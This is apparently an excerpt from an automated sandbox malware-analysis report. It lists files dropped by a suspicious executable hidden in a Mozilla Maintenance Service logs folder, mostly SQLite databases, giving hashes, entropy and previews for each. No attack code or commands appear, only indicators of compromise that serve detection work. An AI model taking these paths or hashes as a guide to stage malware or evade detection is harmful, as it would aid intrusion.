                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.403856189774723
                                                                    Encrypted:false
                                                                    SSDEEP:3:zVIn/6HTJ8CV:BHT+W
                                                                    MD5:2CD5CEDE4BCB812A62DBD10315DD91F3
                                                                    SHA1:F399F8A2D9EC73A5DC1AA962768B1CFCC17D1CBE
                                                                    SHA-256:8C6C71D8EEF7DC5463290A30E851D4615BF4631537A665CCCAC484D60B8C44EC
                                                                    SHA-512:CE6762BC5C64EDA1813A3862903D464554004A548717232D026989533BD3671AC0DD1FB53AB8639BD16756E552FED08C9A6EFDDE1B8DA9EF40895C6F2EA6263A
                                                                    Malicious:false
                                                                    Preview:esmtQovLcjqZFcb6GXM06I8g0
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):215
                                                                    Entropy (8bit):5.329312395326485
                                                                    Encrypted:false
                                                                    SSDEEP:6:hCRLuVFOOr+DER5IlMx5siWNCG7bKOZG1923f1QHfqn:CuVEOCDEfPDWNndtQHC
                                                                    MD5:9CB902672A8C851F4A3767BD7C971C99
                                                                    SHA1:06211A845087A5C86BC726B24F5716738321C3B2
                                                                    SHA-256:9BD41C73810395814FD1CFC92CB262DAE968C85C8C23EE30DA252E36A92647FB
